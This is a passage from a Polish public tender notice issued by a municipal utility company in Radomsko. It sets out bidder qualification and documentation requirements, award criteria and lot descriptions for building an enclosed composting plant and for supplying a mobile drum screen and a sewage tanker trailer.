    w sektorze gospodarki odpadami, w tym: brał udział ( samodzielnie lub w zespole ) w 
    montażu i rozruchu w co najmniej jednej inwestycji związanej z budową kompostowni w 
    systemie zamkniętym, wyposażonej w układ napowietrzania i oczyszczania powietrza w 
    biofiltrze lub urządzeniu równoważnym.     
    Informacja ta winna zawierać:
a) przedmiot zamówienia ( wykaz prowadzonych robót ),
b) podmiot, dla którego realizowane było zamówienie,
c) daty od ( miesiąc/rok ) do ( miesiąc/rok ) pełnienia funkcji Specjalisty ds. montażu i 
    rozruchu.
 - technologiem biostabilizacji tlenowej posiadającym co najmniej: wykształcenie wyższe 
    techniczne, 2 letnie doświadczenie zawodowe w sektorze gospodarki odpadami, w tym: 
    brał udział ( samodzielnie lub w zespole ) na etapie rozruchu instalacji biostabilizacji 
    frakcji odpadów pochodzących ze zmieszanych odpadów komunalnych przy minimum 
    jednym zadaniu polegającym na zrealizowaniu inwestycji związanej z budową 
    kompostowni w systemie zamkniętym, wyposażonej w układ napowietrzania i 
    oczyszczania powietrza w biofiltrze lub urządzeniu równoważnym, przy czym proces, w 
    którym brał udział zakończył się powodzeniem potwierdzonym stosownymi dokumentami, 
    tj. rocznym okresem badań spełniającym zapisy i wymogi Rozporządzenia Ministra 
    Środowiska z dnia 11 września 2012 r. w sprawie mechaniczno-biologicznego 
    przetwarzania zmieszanych odpadów komunalnych ( Dz. U. z 2012 r., poz. 1052 ). 
    Zestawienie badań ( tj. 12 wyników po jednym w każdym miesiącu ) ma stanowić 
    załącznik obligatoryjny do oferty.         
   Informacja ta winna zawierać:
a) przedmiot zamówienia ( wykaz prowadzonych robót ),
b) podmiot, dla którego realizowane było zamówienie,
c) daty od ( miesiąc/rok ) do ( miesiąc/rok ) pełnienia funkcji technologa biostabilizacji 
    tlenowej.
- średnim rocznym zatrudnieniem w liczbie co najmniej 50 pracowników i liczebności 
   personelu kierowniczego w ilości co najmniej 3 osób w okresie ostatnich trzech lat 
   przed upływem terminu składania ofert, a w przypadku gdy okres prowadzenia 
   działalności jest krótszy w tym okresie.
   Warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia 
   dotyczy zadania 1.
     UWAGA!
 1. Zamawiający dopuszcza łączenie funkcji przez wskazane osoby, które realizować będą    
     niniejsze zamówienie, pod warunkiem, że osoba ta spełni łącznie wymagania dla każdej z 
     łączonych funkcji. 
 2. Tam gdzie w opisie warunków udziału w postępowaniu jest mowa o uprawnieniach, 
    należy rozumieć uprawnienia budowlane zgodnie z art. 12, art. 12a oraz art. 14 ust. 1  
    ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2013 r. poz. 1409 z późn. zm. )  
    lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie 
    wcześniej obowiązujących przepisów lub odpowiadające im uprawnienia wydane 
    obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji 
    Szwajcarskiej, z zastrzeżeniem art. 12 a oraz innych przepisów ustawy prawo budowlane 
    oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach 
    członkowskich Unii Europejskiej ( Dz. U. z 2008 r. Nr 63, poz. 394 ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za warunek spełniony, jeżeli Wykonawca wykaże że:
  - posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
    związanej z przedmiotem zamówienia, co najmniej na kwotę 3,0 mln zł ( słownie: trzy 
    miliony złotych ), a w przypadku jego braku, innego dokumentu potwierdzającego, że 
    Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
   działalności związanej z przedmiotem zamówienia.
 - posiada środki finansowe lub zdolność kredytową umożliwiającą realizację zamówienia w 
    wysokości nie mniejszej niż 10,0 mln zł ( słownie: dziesięć milionów złotych ).
    Na potwierdzenie spełnienia powyższego warunku Wykonawca przedstawi informację 
    banku lub spółdzielczej kasy oszczędnościowo - kredytowej, potwierdzającej wysokość 
    posiadanych środków finansowych lub zdolność kredytową Wykonawcy wystawioną nie 
    wcześniej niż 3 miesiące przed upływem terminu składania ofert.
 - osiągnął dobrą i stabilną sytuację finansową wyrażającą się następującymi wskaźnikami za 
    lata obrotowe 2011-2013 tj.:
 - w każdym roku wskaźnik bieżącej płynności finansowej nie mniejszy niż 1,2 ( aktywa 
    obrotowe/zobowiązania krótkoterminowe ),
 - w każdym roku wskaźnik szybkiej płynności finansowej nie mniejszy niż 1,0 ( majątek 
    obrotowy-zapasy-rozliczenia międzyokresowe czynne/zobowiązania krótkoterminowe ).  
 - w każdym roku osiągnął przychody netto ze sprzedaży na poziomie nie niższym niż 
    30,0 mln zł ( słownie: trzydzieści milionów złotych ).
    W celu potwierdzenia i weryfikacji przez Zamawiającego spełnienia powyższego  
    warunku Wykonawcy zobowiązani są przedłożyć sprawozdanie finansowe w całości, a 
    jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o 
    rachunkowości, również z opinią o badanym sprawozdaniu, a w przypadku Wykonawców 
    niezobowiązanych do sporządzania sprawozdania finansowego innych dokumentów 
    określających obroty oraz zobowiązania i należności za każdy zbilansowany rok z ostatnich 
    trzech lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres.   
    Warunek dotyczący sytuacji ekonomicznej i finansowej dotyczy zadania 1.

    UWAGA!
    Wartości podane w walutach innych niż wskazane przez Zamawiającego Wykonawca 
     przeliczy wg średniego kursu NBP na dzień wystawienia dokumentu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku podmiotów niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;</li>

			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Opis techniczny oferowanego urządzenia/pojazdu:
   -  foldery, prospekty, karty katalogowe lub inne dokumenty zawierające parametry
      techniczne i eksploatacyjne w celu potwierdzenia, że oferowane przez Wykonawcę  
      urządzenie/pojazd spełnia parametry i wyposażenie określone przez Zamawiającego w 
      opisie przedmiotu zamówienia. 
      Dokument ten Wykonawca składa dla zadania 2, 3 i 4.
2.  Zestawienie rocznych wyników badań ( tj. 12 wyników po jednym w każdym miesiącu ) 
      spełniających zapisy i wymogi Rozporządzenia Ministra Środowiska z dnia 11 września 
      2012 r. w sprawie mechaniczno-biologicznego przetwarzania zmieszanych odpadów 
       komunalnych ( Dz.U. z 2012 r., poz.1052 ). 
      Dokument ten Wykonawca składa dla zadania 1.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.  Na potwierdzenie spełnienia warunków udziału w postępowaniu oraz braku podstaw do 
     wykluczenia z postępowania Wykonawcy zobowiązani są złożyć w terminie wskazanym w 
     rozdziale 13 i formie określonej w rozdziale 11 siwz: 
1) Wypełniony i podpisany Formularz Ofertowy o treści zgodnej z określoną we wzorze 
     stanowiącym załącznik nr 1 do siwz. 
     Dokument ten Wykonawca składa dla zadania 1, 2, 3 i 4.
2)  Oświadczenie upoważnionego przedstawiciela Wykonawcy o spełnianiu warunków 
     określonych w rozdziale 5 ust.1 pkt 1] siwz. Wzór oświadczenia stanowi załącznik
     nr 2 do siwz. 
     Dokument ten Wykonawca składa dla zadania 1, 2, 3 i 4.
3) Szczegółowy harmonogram rzeczowo-terminowo-finansowy realizacji przedmiotu 
      zamówienia w postaci tabelarycznej, uwzględniający poszczególne etapy, czasokresy i 
      zaangażowanie procentowe dla całego trwania kontraktu - według samodzielnie 
      napisanego załącznika.
      Harmonogram musi zawierać:
   -  podział przedmiotu zamówienia na poszczególne etapy, czasokresy, które mogą stanowić 
      osobny element odbioru częściowego,
   -  zaangażowanie procentowe,
   -  terminy wykonania wyszczególnionych części oraz ich ceny.
      Dokument ten Wykonawca składa dla zadania 1.
4) Oświadczenie Wykonawcy do wniesienia zabezpieczenia i formy należytego wykonania 
      umowy w przypadku uzyskania zamówienia w wysokości 5% ceny ofertowej brutto 
      podanej w ofercie - wg samodzielnie napisanego załącznika.
      Dokument ten Wykonawca składa dla zadania 1.
5) Wykaz części zamówienia, które Wykonawca zamierza zlecić podwykonawcom. Wzór 
      wykazu znajduje się w załączniku nr 9, 10, 11 i 12 do siwz. 
      Dokument ten Wykonawca składa dla zadania 1, 2, 3 i 4.
6) Zaparafowany przez Wykonawcę projekt umowy. Wzór projektu znajduje się w 
      załączniku nr 13, 14, 15 i 16 do siwz. 
      Dokument ten Wykonawca składa dla zadania 1, 2, 3 i 4.
7) Oświadczenie Wykonawcy, że oferowany pojazd/urządzenie odpowiada wymaganiom 
      określonym przez Zamawiającego w siwz - załącznik nr 18 do siwz.
      Dokument ten Wykonawca składa dla zadania 2, 3 i 4.
8) Kosztorys ofertowy. Dokument ten Wykonawca składa dla zadania 1.
9) Dowód wniesienia wadium.
      Dokument ten Wykonawca składa dla zadania 1 i/lub 2, 3 i 4.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji jakości - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dla zadania 1:
1. Zamawiający przewiduje możliwość wprowadzenia istotnych zmian do umowy w 
    przypadku gdy konieczność zmiany, w tym w zakresie wysokości wynagrodzenia, 
    związana jest ze zmianą powszechnie obowiązujących przepisów prawa ( np. w zakresie 
    zmiany wysokości stawki podatku VAT ).   
   W przypadku zmiany wysokości obowiązującej stawki podatku VAT, wynagrodzenie netto  
    pozostanie bez zmian. Kwota brutto zostanie obliczona na podstawie stawki tego podatku 
    obowiązującej w chwili powstania obowiązku podatkowego.
2. Zamawiający dopuszcza możliwość wprowadzenia zmian w treści umowy w przypadku:
 - zmian będących następstwem okoliczności zaistniałych w trakcie realizacji zamówienia 
    nieznanych w dniu podpisania umowy, a szczególności wystąpieniem niesprzyjających 
    warunków atmosferycznych, archeologicznych, geologicznych, hydrologicznych lub 
    zaistnienia kolizji z sieciami infrastruktury, uniemożliwiających terminowe wykonanie 
    zamówienia;
 -  konieczności usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej, 
    jeżeli konieczność wprowadzenia zmian wynika z okoliczności, których Zamawiający nie 
    mógł przewidzieć;
 - ujawnienia niezinwentaryzowanych lub o odmiennym przebiegu niezgodnym z 
    inwentaryzacją podziemnych sieci, instalacji lub urządzeń obcych i konieczności 
    wykonania robót związanych z ich zabezpieczeniem lub usunięciem kolizji;  
 - zmian będących następstwem działania organów administracji lub osób indywidualnych, w 
    szczególności:
- gdy pomimo wystąpienia Wykonawcy lub Zamawiającego o wydanie decyzji 
    administracyjnej, warunków technicznych lub innego dokumentu niezbędnego do 
    prawidłowej realizacji przedmiotu umowy w terminie ustawowo przewidzianym dla danej 
    czynności organ administracji publicznej lub inna upoważniona instytucja nie wyda 
    stosownego dokumentu lub decyzji ( przedłużenie terminu realizacji będzie dopuszczalne 
    jedynie o okres trwania czynności organów administracji publicznej lub instytucji 
    przekraczający termin ustawowo przewidziany dla danej czynności );   

 - gdy pomimo dochowania należytej staranności Wykonawcy pozyskiwanie stosownych 
    uzgodnień, innych podmiotów lub osób, których opinia lub zgoda będzie wymagana 
    przepisami prawa, przedłuży się w czasie ponad termin zwyczajowo przyjęty dla danej  
   czynności ( przedłużenie terminu realizacji będzie dopuszczalne jedynie o okres trwania 
   czynności wykraczający poza zwyczajowo przyjęty );
 - klęskę żywiołową;
 - siłę wyższą.
3. Każda zmiana postanowień niniejszej umowy wymaga formy pisemnej w postaci aneksu 
    pod rygorem nieważności. 
Dla zadania 2,3 i 4:
Zamawiający przewiduje możliwość wprowadzenia istotnych zmian do umowy w 
    przypadku gdy konieczność zmiany, w tym w zakresie wysokości wynagrodzenia, 
    związana jest ze zmianą powszechnie obowiązujących przepisów prawa ( np. w zakresie 
    zmiany wysokości stawki podatku VAT ).   
    W przypadku zmiany wysokości obowiązującej stawki podatku VAT, wynagrodzenie netto  
    pozostanie bez zmian. Kwota brutto zostanie obliczona na podstawie stawki tego podatku 
    obowiązującej w chwili powstania obowiązku podatkowego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pgk-radomsko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o.
97-500 Radomsko, ul. Stara Droga 85
pokój 217.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2015 godzina 11:00, miejsce: Sekretariat Przedsiębiorstwa Gospodarki Komunalnej Sp. z o.o.
97-500 Radomsko, ul. Stara Droga 85.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa kompostowni odpadów biodegradowalnych w systemie zamkniętym wraz z 
    infrastrukturą towarzyszącą, zlokalizowaną na terenie Zakładu Unieszkodliwiania 
    Odpadów Komunalnych w Płoszowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia obejmuje w szczególności wykonanie:
 -  instalacji do stabilizacji frakcji o wielkości co najmniej 0-80 mm ulegającej biodegradacji
    wydzielonej ze zmieszanych odpadów komunalnych - roboty budowlane oraz dostawa i 
    montaż technologii ( system napowietrzania i wentylacji, system ujęcia i oczyszczenia 
    powietrza procesowego, system odprowadzania powstających odcieków, system sterowania 
    i czujników technologicznych wraz z oprogramowaniem, dach i drzwi, kontener 
    techniczny ),
 -  wiaty magazynowej,
 -  placu dojrzewania,
 -  placu pod biofiltr,
 -  placu technologicznego przeznaczonego do magazynowania i przetwarzania odpadów 
    wielkogabarytowych oraz odpadów budowlanych i rozbiórkowych,
 -  placu pod zbiornik na paliwo,
 -  dróg i placów wewnętrznych,
 -  muru oporowego placu magazynowania wsadu,
 -  zewnętrznej instalacji kanalizacyjnej odprowadzającej ścieki deszczowe oraz odcieki 
     technologiczne,
 -  zewnętrznej instalacji wodociągowej,
 -  zewnętrznej instalacji elektroenergetycznej ( zasilającej i oświetleniowej ) i teletechnicznej,
 -  zieleni ozdobnej,
 -  ogrodzenia,
 -  stacji nadawczej dla frakcji 0-80 mm ( dostawa i montaż ),
 -  zbiornika na odcieki o pojemności 600 m3,
 -  rozruchu technologicznego w celu sprawdzenia sprawności wszystkich urządzeń
    i zastosowanej technologii i przeprowadzenia szkolenia załogi Zamawiającego w zakresie 
eksploatacji instalacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.25.38.00-3, 45.21.32.80-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji jakości - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa mobilnego przesiewacza bębnowego w ilości 1 szt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostarczony mobilny przesiewacz bębnowy winien być fabrycznie nowy, nieużywany - rok 
produkcji 2015 o wydajności min. 100m3/h. Powinien służyć do przesiewania: 
- materiału uzyskanego po procesach stabilizacji frakcji o wielkości co najmniej 0-80 mm 
  ulegającej biodegradacji wydzielonej ze zmieszanych odpadów komunalnych oraz po 
  procesach kompostowania odpadów ulegających biodegradacji zbieranych selektywnie,
- odpadów komunalnych zmieszanych,
- kory drzewnej, materiału strukturalnego,
- piasku i żwiru.
Sito musi być urządzeniem mobilnym, na podwoziu przynajmniej tandemowym 
wyposażonym w ABS przystosowane do poruszania się po drogach publicznych z prędkością do 80 km/h..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.90.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji jakości - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa przyczepy ciężarowej rolniczej - pojemnika - wozu asenizacyjnego do 
    wypompowywania i przewozu ścieków w ilości 1 szt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostarczony wóz asenizacyjny winien być fabrycznie nowy, nieużywany i nierejestrowany
    - rok produkcji 2015: 
 1) Wóz asenizacyjny powinien służyć do wypompowywania ścieków ze zbiornika na odcieki 
      ( w zbiorniku znajdować się będą wody odciekowe ze składowiska odpadów, odcieki z 
      obiektu kompostowni oraz ścieki z placów i dróg ) oraz do przewozu ścieków 
      komunalnych.
  2) Urządzenie powinno być dopuszczone do ruchu po drogach publicznych z prędkością  co 
      najmniej 30 km/h..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.90.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji jakości - 10</li>
</ul>
</li>
</ul><br>
